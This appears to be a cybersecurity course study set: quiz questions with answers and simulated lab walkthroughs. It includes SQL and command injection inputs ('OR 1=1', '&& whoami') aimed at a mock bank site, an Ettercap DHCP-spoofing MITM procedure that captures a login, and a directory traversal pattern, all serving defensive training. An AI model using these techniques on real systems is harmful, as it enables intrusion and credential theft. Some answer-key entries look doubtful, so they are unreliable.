CIT 484: CYBERDEFENSE PRO
Listen to simulation instructions You are the cybersecurity analyst for a small corporate network. You are exploring your online bank's web page to see how secure it is. In this lab, your task is to see if a SQL injection attack is possible on your online bank using the following information: Banks site: MySecureOnlineBank.com Make an account query for account number: 90639 Answer Question 1. Look up the following account numbers. Make note of the results of each search.112123123412345123456 Answer Question 2. Try your account number followed by the following additional information:90639 bob90639 dog90639 cat Answer Question 3. Try a SQL injection attack using the following account numbers:any_5_digits OR 1=1 (OR is part of the value)Answer Question 4.any_5_digits && whoamiAnswer Question 5.
1- 10,625.79 2- Five or more 3- The input is not restricted 4- 90006 5- www-user
Which of the following BEST describes adaptive hashes?
A function that feeds the hashed output back into the function a preset number of times.
Which of the following describes a credential stuffing attack?
A hacker tries a list of credentials on multiple sites.
Which of the following best describes a script kiddie?
A hacker who uses scripts written by much more talented individuals
The sender's name, company position, address, and phone number are commonly found in which of the following?
An email's signature block
Which of the following would the red team MOST likely use?
An ethical hacker
Which security control layer involves putting in place policies that comply with industry standards, such as OWASP?
Application
Which IoT security category does disabling guest or demo accounts fall under?
Authentication
Which of the following IoT security challenges can 2FA (two-factor authentication) help mitigate?
Authentication
Which of the following SQL injection attack types uses true/false questions to perform reconnaissance?
Blind injection attack
Which web application scanner looks for common vulnerabilities, like cross-site scripting and SQL injections, and also scans for the OWASP Top 10?
Burp Suite
A user has reported that they can't remote into the OpenSSH service running on their Windows 10 machine that they use to transfer files from a development Linux box. You are at the Windows machine and have Task Manager running. You notice that the SSHD, the OpenSSH server process, is not in the list on the Processes tab of Task Manager. Which tab on the screenshot below would you click on, and which steps could you take to start the service and ensure it starts every time the machine is booted?
Click on the Services tab and then click Open Services at the bottom. Then find the OpenSSH SSH Server entry, double-click on it, and click the Start button. Change the Startup Type field to Automatic.
Which of the following attacks targets the managed service provider itself?
Cloud hopper
What should be the FIRST reconnaissance countermeasure taken?
Create information sharing policies.
Which of the following IoT attacks involves using IoT devices as a zombie army to target a server or system?
DDoS attack
Which of the following firewall evasion techniques is used to redirect a user to a malicious website?
DNS poisoning
What is vandalism?
Damaging or defacing assets
Which of the following permissions would take precedence over the others?
Deny Read
Which government agency sponsors five valuable resources for security analysts?
Department of Homeland Security
Which of the following attack types overflows the server, causing it to not function properly?
DoS
Which of the following certification types has the lowest level of certificate assurance?
Domain
You are the security analyst for a small corporate network. Recently, several of your computers were infected by a Trickbot virus. It appears they got the virus from a spreadsheet. Various versions of spreadsheets had different requests for the virus files from different servers. You are using Security Onion Hunter to analyze the attack. In this lab, your task is to: Log in to Security Onion and access Hunt.Security Onion server: 192.168.0.101Email address: [email protected]: password From Hunt:Examine the ET INFO Dotted Quad Host DLL Request alert event.Answer Questions 1 and 2.Examine the ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 alert event.Answer Questions 3 and 4.
1- update.dll 2- The server is requested using a raw IP address instead of a hostname. 3- Suricata 4- 694272
You are the security analyst for a small corporate network. To better recognize and defend against DHCP man-in-the-middle (on-path) attacks, you have decided to create and analyze this type of attack using the Ettercap tool. In this lab, your task is to complete the following: On IT-Laptop, use Ettercap to launch a man-in-the-middle (MITM) DHCP spoofing attack using the following parameters:Netmask: 255.255.255.0DNS Server IP: 192.168.0.11View the IP address.Answer Question 1. On Support, complete the following tasks:Using Wireshark and the enp2s0 interface, start a capture and filter the display, showing only DHCP traffic.From the Terminal, view the default gateway addresses.Answer Question 2.Bring the network interface down and back up to request new DHCP addresses.View the gateway again to see if anything changedAnswer Question 3.In Wireshark, analyze the DHCP ACK packets captured to find the router IP addresses used.Answer Question 4. On Office1, analyze the effects of the man-in-the-middle attack by completing the following tasks:View the default gateway.Answer Question 5.Use tracert to find the path to rmksupplies.com.Answer Question 6.Release and renew the IP addresses assigned by DHCP.Check the default gateway of the computer again. What has changed?Answer Question 7.Use tracert to find the path to rmksupplies.com. Has anything changed?Answer Question 8.Log into the rmksupplies.com employee portal with the following credentials:Username: bpascal(Blaise Pascal)Password: Dontrygu3ss1ng On IT-Laptop, find the captured username and password in Ettercap.
1. On IT-Laptop, start unified sniffing on the enp2s0 interface. a. From the Favorites bar, select Ettercap. b. Select Sniff > Unified sniffing. c. From the Network Interface drop-down list, select enp2s0. d. Select OK. e. Select Mitm > DHCP spoofing. f. In the Netmask field, enter 255.255.255.0 g. In the DNS Server IP field, enter 192.168.0.11 h. Select OK. 2. View the IP address of the IT-Laptop computer. a. From the Favorites bar, select Terminal. b. At the prompt, type ip addr show and press Enter. c. In the top right, select Answer Questions. d. Answer Question 1. e. Close the Lab Questions dialog. 3. On Support, start a Wireshark capture on the enp2s0 interface and filter for only DHCP packets. a. From the top navigation tabs, select Floor 1 Overview. b. Under Support Office, select Support. c. From the Favorites bar, select Wireshark. d. Under Capture, select enp2s0. e. Select the blue fin to begin a Wireshark capture. f. In the Apply a display filter field, type bootp and press Enter to show only DHCP packets.Notice that no packets are being captured. 4. View the default gateway for Support. a. From the Favorites bar, select Terminal. b. Type route and press Enter. c. In the top right, select Answer Questions. d. Answer Question 2. 5. Request new DHCP addresses for the enp2s0 interface. a. From the terminal, type ip link set enp2s0 down and press Enter to bring the interface down. b. Type ip link set enp2s0 up and press Enter to bring the interface back up.Notice that DHCP packets (bootp) have been captured. 6. View the current default gateway on Support. a. In Terminal at the prompt, type route and press Enter. b. Close the Lab Questions dialog. 7. In Office1, view the current default gateway and the route to the rmksupplies.com site. a. From top navigation tabs, select Floor 1 Overview. b. Under Office 1, select Office1. c. Right-click Start and select Windows PowerShell (Admin). d. Type ipconfig and press Enter. e. In the top right, select Answer Questions. f. Answer Question 5. g. Type tracert rmksupplies.com and press Enter. h. Answer Question 6.Note that the first hop and default gateway were determined prior to the MITM attack. 8. View the effects of the MITM attack on Office1's IP addresses. a. At the prompt type, ipconfig /release and press Enter to release the currently assigned addresses. b. Type cls and press Enter to clear the screen. c. Type ipconfig /renew and press Enter to request new IP addresses from the d. Type tracert rmksupplies.com and press Enter. 9. From Google Chrome, log into the rmksupplies.com Employee Portal. a. From the taskbar, select Google Chrome. b. Maximize the window for easier viewing. c. In the URL field, enter rmksupplies.com and press Enter. d. At the bottom of the page, select Employee Portal. e. In the Username field, enter bpascal. f. In the Password field, enter Dontrygu3ss1ng. g. Select Login. You are logged in as Blaise Pascal. 10. From IT-Laptop, find the captured username and password in Ettercap. a. From the top navigation tabs, select Floor 1 Overview. b. Under IT Administration, select IT-Laptop. c. Maximize Ettercap. d. In Ettercap's bottom pane, find the username and password used to log into the Employee Portal. 11. Answer the questions. a. In the top right, select Answer Questions to end the lab. b. Select Score Lab. 1- 192.168.0.46 2- 192.168.0.5 3- 192.168.0.46 4- 192.168.0.5, 192.168.0.46 5- 192.168.0.5 6- 192.168.0.5 7- 192.168.0.46 8- 192.168.0.46
Which of the following is a SIEM collection tool that's used to search and analyze large collections of data in multiple formats?
Splunk
Costs that are easily identifiable and quantifiable, such as damaged hardware, stolen passwords, and lost or corrupted data, are considered which type of impact?
Tangible
Which of the following frame (packet) subtrees would you expand in order to view the POST data that was captured by Wireshark?
The HTML Form URL Encoded: subtree would have the POST data.
You created a honeypot server using Pentbox. After a while, you go back to the honeypot server to see what it has been capturing. Which of the following can be gleaned from the results shown?
The operating system used by the attacker
A Windows web server that was reported as being compromised has been scanned, patched, and appears to be running properly with no indications that it is still compromised. The server is back in production, but users are complaining that they receive certificate errors when connecting to it. You did not perform the quarantine on the machine (a coworker did). They also performed the patching and scanning before putting it back to work in production. What might be causing the certificate errors?
The server certificate was revoked since the private key may have been compromised.
What does the HTTP response message 5xx indicate?
The server did not complete the request.
What is the main purpose of SOAR?
To replace tasks that are repetitive and done manually with automated workflows
What information can an organization obtain as part of a SCAP security scan?
Whether or not their systems are configured for optimal security.
An attacker needs the following information about his target: domain ownership, domain names, IP addresses, and server types. Which tool is BEST matched for this operation?
Whois
You are working for a company that has one domain and multiple subdomains. Which certificate type would you need?
Wildcard
Which wireless component functions as a bridge between a wired and wireless network?
Wireless access point
When performing active reconnaissance, a malicious actor may try to do which of the following?
Work at peak hours to blend in
Which of the following BEST describes the role of a remediation server?
Works to bring devices up to a minimum security level.
Which of the following Linux permissions allows files to be added or deleted from a directory?
Write
A security analyst is working to discover zero-day attacks before the system is compromised. What is one method for discovering these types of attacks that the security analyst should try?
Write rules in a program like YARA that recognizes similar patterns of code found in other malware and flags them if they interact with the system.
Which of the following attacks exploit vulnerabilities in the web application and allows the attacker to compromise a user's interactions with the app?
XSS
Which type of scan turns on an abundance of flags, causing the packet to be lit up?
Xmas tree scan
Threats that do not have an existing fix, do not have any security fixes, and do not have available patches are called what?
Zero-day threats
Cisco devices have a special interface called _____, which is designed to act as a blackhole.
null0
You are tasked with enumerating an exploited machine using Metasploit. The target system is already connected to the Metasploit console, and you have executed the help command to see which options are available. Which of the listed commands will give you the computer name, operating system, and hardware architecture?
sysinfo
Which Linux command can be used to provide a table of each running process?
top
Which software facilitates communication between different virtual machines by checking data packets before moving them to a destination?
vSwitch
After having calculated the MD5 hash for a file, you need to compare it to the value provided by the vendor. You could examine each character to ensure it is correct, but PowerShell has a utility for comparing the strings. Which of the following would be an example of that command?
"2b8efe1bee907243f22c16e14032a5ea" -eq "2b8efe1bee907243f22c16e14032a5ea"
Fred runs a small manufacturing shop. He produces consumer goods on his equipment. Suppose Fred has six stamp presses each valued at $35,000. At any given time, two of his presses might be out of service due to mechanical breakdowns or required upgrades. What is Fred's single loss expectancy?
$70,000
Fill in the missing piece of the command: Nmap has the ability to generate decoys that make the detection of the actual scanning system become much more difficult. The nmap command to generate decoys is nmap ____ RND:10 target_IP_address
-D
Which file on a Linux system can be enumerated to display all known users?
/etc/passwd
Listen to simulation instructions As the security analyst for your company, you are performing a test to verify email security. You are specifically concerned that the HR department may be sending employees' personally identifiable information (PII) in cleartext through emails. In this lab, your task is to: Capture packets on the enp2s0 interface using Wireshark. Find packets containing the following information using display filters:Social security numbers (SSNs)Birth datesDirect deposit routing numbersMothers' maiden names
1- 212-09-3158 2- Williamson 3- 3 4- 123456781
Listen to simulation instructions You are the security analyst for a small corporate network. Recently, several of your computers were infected by a Trickbot virus. It appears they got the virus from a spreadsheet. Various versions of spreadsheets had different requests for the virus files from different servers. You are using Security Onion Hunter to analyze the attack. In this lab, your task is to: Log in to Security Onion and access Hunt.Security Onion server: 192.168.0.101Email address: [email protected]: password From Hunt:Examine the ET MALWARE Win32/Trickbot Data Exfiltration alert event.Answer Questions 1 and 2.Expand and examine the ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 2 alert event.Answer Questions 3 and 4.Examine the ET USER_AGENTS Suspicious User-Agent (contains loader) alert event.Answer Question 5.Examine the ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response alert event.Answer Question 6.
1- Cambodia 2- 00-08-02-1C-47-AE 3- It is not a standard HTTP port. 4- 8015558861 5- imgpaper.png 6- 446515
You are a security analyst and have been testing Burp Suite with your online bank. You have already configured Google Chrome to use Burp Suite as a proxy server, allowing all web traffic to pass through Burp Suite. In this lab, your task is to explore Burp Suite repeater: Open Burp Suite and turn off Intercept. Look up your account balance on mysecureonlinebank.com using the following information:Use Google Chrome.Bank URL: mysecureonlinebank.comAccount number: 90342 From Burp Suite, explore the repeater using mysecureonlinebank.com as follows:Send the GET entry containing an account number to the Repeater.In repeater, alter the account number to 90639 and then resend the page.Answer Question 1. Use the Repeater to perform a simple injection attack using the following information:Alter the account number to 90639 OR 1=1 and then resend the page.Answer Question 2.Alter the account number to 90639 && whoami and then resend the page.Answer Question 3.
1- Olivia Martinez 2- 90005 3- www-login
You are a security analyst and have been testing Burp Suite with your online bank. You have already configured Google Chrome to use Burp Suite as a proxy server, allowing all web traffic to passes through Burp Suite. In this lab, your task is to use Burp Suite to fuzzer test SQL injections as follows: Open Burp Suite and turn off intercept. Lookup your account balance on mysecureonlinebank.com using the following information:Use Google Chrome.Bank URL: mysecureonlinebank.comAccount number: 90342 Launch a simple payload attack against the mysecureonlinebank.com site using the following information:Send the GET entry containing an account number to Intruder.In Intruder, select the account number (90342) as the position for the attack payload.Examine the Payload Options [Simple List] already selected on the Payloads page.Launch the attack. Analyze the results of the payload attack.As the attack progresses click on several lines and examine the results.The response length field will give you clues as to which type of response was received. Answer the questions.
1- SQL Syntax Error 2- Bad Request 3- 21
You are the security analyst for a small corporate network. Several employees have received strange invoice-related emails from the account manager that ask for information he should already know. You suspect that someone is impersonating the account manager's email account by spoofing his email address. You have decided to run a test to see if this is true. In this lab, your task is to: Capture packets on the enp2s0 interface using Wireshark. Use display filters to find packets containing invoice emails. View the email header and determine if the manager's email address has been spoofed. The manager's information is:Name: Robert JensonEmail: [email protected] Answer the questions.
1- emkei.cz 2- fail 3- yes
You are the security analyst working for CorpNet. Your company wants to protect against any potential weakness in their public-facing servers. They would like to make sure that all of their servers are running up to date web server software, and they don't want to expose the servers to threats by using outdated security protocols or easily exploitable ports. Computer NameIP AddressDomain NameCorpNet_www198.28.1.1www.corpnet.xyzCorpNet_www2198.28.1.2www2.corpnet.xyzCorpNet_www3198.28.1.3www3.corpnet.xyzwww_stage198.28.1.15www_stage.corpnet.xyz In this lab, your task is to scan the public facing web servers as follows: Run the curl --head command against each server. Using nmap, run the ssl-enum-ciphers.nse script against the secure web server port on each server. Answer the questions.
1- www3.corpnet.xyz (198.28.1.3) 2- www.corpnet.xyz (198.28.1.1) www_stage.corpnet.xyz (198.28.1.15) 3- www_stage.corpnet.xyz (198.28.1.15)
You are the security analyst for a small corporate network. You believe a hacker has penetrated your network and is using ARP poisoning to infiltrate it. In this lab, your task is to discover whether ARP poisoning is taking place as follows: Use Wireshark to capture packets on the enp2s0 interface for five seconds. Analyze the Wireshark packets to determine whether ARP poisoning is taking place. Use the 192.168.0.2 IP address to help make your determination. Answer the questions.
1. 00:00:1B:11:22:33 2- 00:00:1B:33:22:11
You are the security analyst for a small corporate network. While conducting some tests to see if your network can be hacked, you have discovered that you can obtain a copy of the zone information from the CorpDC3 server. This server is a domain controller in the CorpNet.local domain and holds an Active Directory-integrated zone for the CorpNet.local domain. To better protect the company zone data, you have decided to prevent zone transfers. In this lab, your task is to disable zone transfers for the CorpNet.local zone.
1. Access the CorpNet.local properties settings. a. From Server Manager, select Tools > DNS. b. From the left pane, expand CORPDC3 > Forward Lookup Zones. c. Right-click CorpNet.local and then select Properties. 2. Disable zone transfers. a. Select the Zone Transfers tab. b. Clear Allow zone transfers. c. Select OK.
Listen to simulation instructions You are the security analyst for a small corporate network. You are attempting to improve the password security of the Windows 10 laptop located in the Lobby. In each policy, the Explain tab provides a description of the policy's effects to help you identify the policies and values to configure. In this lab, your task is to use the Local Security Policy tool to configure password restrictions as follows: New passwords cannot be the same as the previous 4 passwords. Passwords must be changed every 30 days. New passwords cannot be changed for at least 2 days. Passwords must be at least 10 characters long. Passwords must contain non-alphabetical characters. Automatically unlock locked accounts after 1 hour. Lock the user account after four incorrect logon attempts within a 40-minute period.
1. Access the Local Security Policy. a. Select Start > Windows Administrative Tools. b. Select Local Security Policy. c. Maximize the window for easier viewing. 2. Configure the password policies. a. From the left pane, expand and select Account Policies > Password Policy. b. Double-click the policy you want to configure. c. Configure the policy settings. d. Select OK. e. Repeat steps 2b-2d to configure additional policies. 3. Configure the account lockout policies. a. From the left pane, select Account Lockout Policy. b. Double-click the policy you want to configure. c. Configure the policy settings. d. Select OK.
You are the security analyst for a small corporate network. To defend against non-authorized applications from being installed on the systems in you company, you have decided to implement Microsoft's Windows Defender Application Control (WDAC). You have already created a golden system containing all of the desired applications. In this lab, your task is to complete the following: From Office2 (the golden system), create an XML file that will be used to create the initial code integrity policy (CIPolicy).When running the command:Use the -Level Pca and -UserPEs flags.Scan the entire C:\ drive. Convert the XML file to a binary file named AppCIP.bin. Save the converted file in the CorpDC\WDAC share. The C:\WDAC folder on CorpDC is shared as WDAC. From CorpDC (a VM running on CorpServer), create and implement a Group Policy Object (GPO) to implement the above policy company-wide. GPO information:On CorpDC in the CorpNet.local domain, create a GPO named App-WDAC.For Device Guard, enable and configure the Deploy Windows Defender Application Control setting to use the code integrity policy file you saved.
1. From Office2, create an XML file that will be used to create the initial code integrity policy (CIPolicy). a. Right-click Start and then select Windows PowerShell (Admin). b. From PowerShell, run New-CIpolicy AppCIP.xml -Level Pca -ScanPath C:\ -UserPEs c. Wait for the scan to complete. 2. Convert the XML file to a binary file and save it on CorpDC in the WDAC share. a. From PowerShell, run ConvertFrom-CIPolicy AppCIP.xml C:\AppCIP.bin b. From the Windows taskbar, select File Explorer. c. From the left pane, expand and select This PC > System (C:). d. Right-click AppCIP.bin and then select Copy. e. From the left pane, expand and select Network > CorpDC > WDAC f. In the right pane, right-click and select Paste. 3. Switch to CorpServer and connect to the Hyper-V CorpDC server. a. From the top navigation area, select Floor 1 Overview. b. Under Networking Closet, select CorpServer. c. From the Hyper-V Manager, select CORPSERVER. d. From the Virtual Machines pane, double-click CorpDC. 4. Create the WDAC GPO in the CorpNet.local domain. a. From Server Manager's menu bar, select Tools > Group Policy Management. b. Maximize the window for better viewing. c. Expand Forest: CorpNet.local > Domains. d. Right-click CorpNet.local and select Create a GPO in this domain, and link it here. e. In the Name field, use App-WDAC and then select OK. 5. Enable and configure the Deploy Windows Defender Application Control policy to distribute the AppCIP initial code integrity policy. a. Expand CorpNet.local and then right-click App-WDAC and select Edit. b. Maximize the window for better viewing. c. From the left pane, expand and select Computer Configuration > Policies > Administrative Templates > System > Device Guard. d. From the right pane, double-click Deploy Windows Defender Application Control. e. Select Enabled. f. In the Code Integrity Policy file path field, enter C:\WDAC\AppCIP.bin. The WDAC network share on CorpDC is the local folder C:\WDAC. g. Select OK.
Jason, an attacker, has manipulated a client's connection to disconnect the real client and allow the server to think that he is the authenticated user. Which of the following describes what Jason has done?
Active hijacking
Charles, a security analyst, needs to check his network for vulnerabilities. He wants a scan that interacts with network nodes and repairs security issues found. Which kind of scanning BEST describes Charles' requirements?
Active scanning
Which type of wireless network does not use a wireless access point?
Ad-hoc
Which of the following two methods can be used to refine the number of alerts displayed in Kibana based on search rules? (Select two.)
Add a filter in the Search field. Click a ring on the Security Onion - Data Overview graph.
On rare occasions, an individual computer contains information that is highly confidential and must remain separated from both internal and external networks. Which of the following segmentation solutions would BEST achieve this goal?
Air gap
You have just used OWASP ZAP to run a vulnerability scan on your company's site. From the Information window, select the tab that lets you view the vulnerabilities found.
Alerts
Which of the following is the client responsible for in a PaaS cloud service model?
All applications developed
You are the security administrator for your organization. You need to provide Mary with the needed access to make changes to the finances.xlsx file located in the Accounting directory. Which of the following permissions should you set for Mary?
Allow Write permission on the finances.xlsx file.
While looking at your Security Onion appliance, you noticed that there was a significant increase in after-hours traffic on your network when all workstations were powered off and nobody else was in the office. Some of this traffic generated alerts in Kibana. Also, your web server was very slow to respond when you checked the website. With the information in the graph below, what might be the cause? (Select two.)
An ICMP flood attack A DDoS attack
A user of your website has posted a message for others to view. After several employees complain of strange behavior on their browser after visiting the site, you investigate and find some text: There is more than just what is displayed, contained between the What kind of attack is this?
An XSS vulnerability attack.
Which of the following BEST describes a DoS fragmentation attack?
An attack in which fake UDP or ICMP packets larger than the MTU are sent to exhaust the processing resources.
Why should DNS zone transfers be restricted or disabled?
An attacker can intercept the transfer and change information.
Which of the following BEST describes a TCP session hijacking attack?
An attacker sniffs between two machines on a connection-based protocol, monitors the traffic to capture the session ID, terminates the target computer's connection, and injects packets to the server.
Which of the following BEST describes horizontal escalation?
An attacker trying to access a user on the same system.
Which of the following BEST describes a high-value asset?
An offline asset that halts production.
Which of the following BEST describes Retina CS for Mobile?
Analyzes and reports findings from a centralized data warehouse.
One component of the ALE calculation is ARO. What does ARO represent?
Annualized rate of occurrence
You have performed a SQL injection attack against a website using Burp Suite and see the following results. What are you looking for?
Any results that show something unexpected being passed back from the server
Which of the following web server technologies does Linux typically use?
Apache
At which layer is a web application firewall log used to record HTTP traffic?
Application
A company is considering the purchase of a new application. During the evaluation period, a security analyst wants to make sure that all areas of the app are secure, especially input controls. Which assessment BEST meets these requirements?
Application-level assessment
John's company just purchased a new application for which they do not have the source code. Which of the following BEST describes the type of assessment John should use on this application?
Application-level assessment
You have collected files that contain evidence of a cyber crime committed against your company. You are required to share each file with legal teams, law enforcement, and the CEO of your company. Which of the following is the first thing to do to ensure that the files are not tampered with and everyone gets the exact same information in the files?
Apply a CHF to each file.
Attackers have used a brute force attack to crack CHF hashes in your network. What could you do to better protect the original strings?
Apply adaptive hashing.
Which of the following are true regarding parameterized queries? (Select two.)
Are pre-compiled SQL statements Help prevent SQL injection attacks
Which of the following types of devices use sensors to gather data and send that data back to specialized controllers to make decisions and changes in the systems?
Automated systems
The third step in vulnerability management is to see what an organization looks like from an outsider's and insider's point of view. Which step in life cycle management does this apply to?
Baseline creation
You have just installed Nessus for auditing a network segment. Which of the following Nessus scans would be BEST suited for an initial query of hosts on a network segment?
Basic Network Scan
You are configuring a new email server for your organization and need to implement a firewall solution. The firewall will be designed to handle connections to the email server. Which of the following would be the BEST firewall solution?
Bastion host
Which of the following could you use as an LDAP countermeasure?
Block port 389.
Which of the following attacks sends unwanted messages to Bluetooth devices?
Bluejacking
Which of the following Kali Linux utilities can be used to find Bluetooth devices? (Select two.)
Bluelog Blueranger
Which of the following is a utility that hackers can use to locate vulnerable Bluetooth devices?
Bluesniff
Which method is used to verify that a connected device is trusted?
Bus encryption
How is probability determined using qualitative analysis?
By a team of subject matter experts
Which of the following is an entity that issues digital certificates?
CA
Which of the following is a dictionary of known patterns of cyberattacks used by hackers?
CAPEC
Which of the following tools is best for ensuring that users have access to only the applications and resources they need in a private cloud?
CASB
Which vulnerability scoring system uses metrics called base, temporal, and environmental?
CVSS calculator
Mary is using her laptop at the local coffee shop. Before being allowed to their wireless internet, she was prompted to agree to the terms and conditions of using the network. Which wireless access method is the coffee shop using?
Captive portal
BitLocker is being deployed to all Windows machines on your network. A new machine has been installed with the latest Windows 10 software and needs to have its drive encrypted. When you start to encrypt, you see the following error. You know that this machine has a TPM because your own workstation is the same model. What should you do?
Check the BIOS to ensure that the TPM is enabled and activated.
You are in the process of configuring pfSense Snort as your intrusion detection and prevention system (IDS/IPS). You want to ensure that it includes the anti-malware IDS/IPS rule set that enables users with cost constraints to enhance their existing network-based malware detection. Select the option that would add these rule sets.
Click to enable download of Emerging Threats Open rules
Which web application architecture layer includes the physical devices that are used to access the web application?
Client/Presentation
A security analyst must identify risks and figure out how best to mitigate them. Which of the following are risk mitigation techniques? (Select three.)
Close unused ports on a firewall. Train users to identify email attacks. Ensure systems are patched and updated.
When you create an event subscription, events are sent from one computer to another. What is the computer that receives the events called?
Collector computer
Which of the following configurations can be used with Windows Event Forwarding? (Select two.)
Collector-initiated subscriptions Source-initiated subscriptions
Which of the following is a type of malware that can be purchased in a ready-to-use state, is created to be used with a variety of targets, can be integrated with other malware programs, and can be implemented in stages?
Commodity malware
Which resource can BEST be described as a site that combines diverse ideas and perspectives from professionals, academics, and government sources?
Common Weakness Enumeration
Which cloud deployment model would MOST likely be used by several organizations that share the same regulatory requirements?
Community cloud
As you're investigating an incident for your company, you discover that a crash on the suspect's computer occurred and created a snapshot of everything that was in physical memory at the time of the crash. Which type of memory dump is this?
Complete memory dump
Creating a baseline is vital to managing vulnerabilities. What is the FIRST step in creating this baseline?
Conduct a pre-assessment
You are a cybersecurity consultant and have been asked to work with rmksupplies.com to ensure their network is protected from hackers. You are evaluating the security of their website using Burp Suite. You have already configured Google Chrome to use Burp Suite as a proxy server so that all web traffic passes through Burp Suite. In this lab, your task is to use Burp Suite to evaluate website logins as follows: Open Burpe Suite and turn Intercept off. Monitor the HTTP History tab while logging in to the rmksupplies.com Employee Portal.Username: sramirezPassword: mickeyminniegoofypluto Examine the POST entry in HTTP History to discover if this website is vulnerable to attack. Answer the question.
Configure HTTPS on the rmksupplies.com web server
An employee has been dismissed from the company and is suspected of gathering sensitive customer data before their termination. The legal team has asked you to perform a forensic examination of their workstation hard drive. Before you begin examining the contents of the device, what should you do?
Connect a write blocker to prevent changes being accidently made to the device.
Which of the following technologies is a hypervisor substitute that separates resources at the operating system level?
Containerization
During which phase of the incident response life cycle do you isolate affected systems and restrict communication to only trusted individuals?
Containment
You have decided to configure an ARP cache poisoning on-path (man-in-the-middle) attack to test a new computer on your network to verify that it connects to required company resources securely. After defining the target hosts in Ettercap and capturing data during several login attempts, you see the following. What should your next step be in checking for a cookie hijacking attack?
Copy the user_token field value and use a cookie copy tool, such as the Google Chrome Copy Cookies extension, to attempt to access the same resource found at the URL listed.
John the Ripper is a popular tool that helps attackers. Which of the following is its main function?
Crack passwords
You are configuring a pfsense appliance to support a new guest Wi-Fi network, which will be used by potentially hundreds of customers per day. This new network will connect to the internet through your corporate network, although many switches and firewalls are in place to help with security. You are using a pfsense appliance to serve up the terms and conditions for users to agree to. What might be the BEST option for keeping your corporate network secure?
Create a VLAN for the new Wi-Fi network.
The following output was displayed using the Social Engineering Toolkit (SET). Which attack method was used to capture the user's input?
Credential harvesting attack method
John creates an account and creates a listing for the sale of his home. He uses HTML tags to bold important words. Chris, an attacker, spots John's listing and notices the bolded words. Chris assumes HTML tags are enabled on the user end and uses this vulnerability to insert his own script, which will send him a copy of the cookie information for any user who looks at the ad. Which type of attack method is Chris most likely using?
Cross-site scripting
What is the name of the sanitization method that involves destruction of an encryption key to render a drive's data useless?
Cryptographic erase
There is a feature that has the following characteristics: Is deterministic. Can quickly compute the fixed-sized bit array for any given input. Creates a unique fixed-sized bit array for each input. Creates a new array if any modification occurs to the original input. These characteristics BEST describe which of the following?
Cryptographic hash function
An impact analysis evaluates the cost of an attack. Which of the following would be considered a non-financial cost?
Customer satisfaction Reputation
In 2016, an attacker used a botnet of security cameras, DVRs, and network printers to target a cloud-based internet performance management organization that provided DNS services to large corporations. This created connectivity issues for legitimate users across the United States and Europe. Which type of attack was MOST likely used in this scenario?
DDoS attack
You train your staff to notify you if they notice any of the following signs: Services are unavailable or very slow Unexpected 503 error messages Abnormal spikes in network traffic Customer complaints about access Which type of attack are you preparing against?
DDoS attack
Which of the following is an email authentication tool that relies on an email's encrypted digital signature to verify its authenticity?
DKIM
Which of the following tools allows domain owners to notify receivers that emails have been authenticated, provides feedback about the legitimacy of emails sent on their domain, and applies instructions for emails that failed authentication?
DMARC
During the reconnaissance phase, an attacker is looking for common attack vectors. Which of the following services is MOST likely to be targeted?
DNS
Which of the following should be implemented as protection against malware attacks?
DNS sinkhole
Which of the following would an external assessment check?
DNS zones
You are looking for a wipe utility to erase deleted files without affecting any other files. Which utilities could you use? (Select two.)
DP Shredder Cipher
The economic impact of an incident can be tangible or intangible. Which of the following costs would be considered intangible? (Select two.)
Damage to reputation Loss of potential customers
Where can you find a quick overview of your monitored system's current state?
Dashboard
Large data transfers to unusual devices could be a sign of which Indicator of Compromise (IOC)?
Data exfiltration
Which type of breach happens when an attacker removes or transfers data from your system to another?
Data exfiltration
You have observed that Steve, an employee at your company, has been coming in at odd hours, requesting sensitive data that is unrelated to his position, and bringing in his own flash drive. Steve's actions are common indicators of which of the following threats?
Data loss
Which of the following is the process of obfuscating data by changing it into random characters?
Data masking
A suspicious program is run in a controlled environment, where a security analyst monitors the program's execution to track the effect it has on computer resources, like its operating system. The analyst can set breakpoints or pause the program for reports on memory content, storage devices, or CPU registers. Which reverse engineering tool is the analyst using?
Debugger
Which of the following firewall evasion countermeasures should be implemented to mitigate firewall evasion? (Select two.)
Defense in Depth Filtering an intruder's IP address
As a security analyst working for an accounting firm, you need to evaluate the current environment. Which of the following is the FIRST thing you should do?
Define the effectiveness of the current security policies and procedures.
You are the security analyst for a small corporate network. Recently, your network became extremely slow. You have decided to use Security Onion to see if you can determine the cause. In this lab, your task is to: Log in to Security Onion and access Kibana.Email address: [email protected]: password From Kibana, examine the Discover and Dashboard pages for possible issues. Answer the questions.
Denial-of-service attack
Mary, a security analyst, is tasked with vulnerability research as part of her company's vulnerability assessment. She discovered that their website is vulnerable to cross-site scripting. Which vulnerability type BEST describes what Mary has found?
Design flaw
Which of the following are characteristics of embedded systems?
Designed to perform a single function Sealed system Handle processes in a deterministic manner
During which phase of the incidence response life cycle do you identify an attack or an incident after it has begun?
Detection and analysis
Which type of security control identifies, logs, and reports incidents as they happen?
Detective
Which security control makes a system more difficult to attack?
Deterrent
Which IoT communication model would MOST likely be used by a thermostat?
Device-to-device model
Which of the following is the science of gathering and analyzing digital data in relation to a computer crime or cyber attack?
Digital forensics
Which of the following attacks would use the following syntax? http://www.testout.com.br/../../../../ some_dir/ some_file
Directory traversal
Before signing an agreement with a new vendor, which type of assessment should you complete?
Due diligence
Which of the following are best practices to secure mobile devices for users?
Encrypt the device storage. Set up remote wipe. Don't auto-upload photos to social media.
While investigating a potential security breach on a Windows machine, you list the commands that have recently been executed from the command line and find the following: arp -a, set username, set computername, net localgroup administrators, and tasklist. There are other commands as well. While then checking the running processes, you see the output below in Task Manager. It's clear that someone has compromised the Windows machine. What would you call the phase of the attack that you have found?
Enumeration
An attacker wants to use a SQL injection attack against your web application. Which of the following can provide useful information to the attacker about your application's SQL vulnerabilities?
Error messages
Which of the following is a trust relationship that exists between different organizations or applications?
Federation
As you're investigating a cyber crime in your organization, you suspect that important files have been deleted. Which of the following techniques can you use to bypass the file system and recover files based only on their structure by scanning raw bytes of disk data in order to reassemble them for examination?
File carving
The following steps BEST describe which one of the following data monitoring methods? Keep a user log to document everyone that handles each piece of sensitive data. Monitor the system in real time.
File monitoring
An employee has asked for help with some files they accidently deleted from their machine. They were a training schedule and a resume for a new employee named Jack. You access the machine, install Recuva, and run it. You point to the directory where the files were located, but you only see one file can be recovered. How do you best explain this?
File recovery software can't always reclaim data from free space.
Gathering information about a system, its components, and how they work together is known as which of the following?
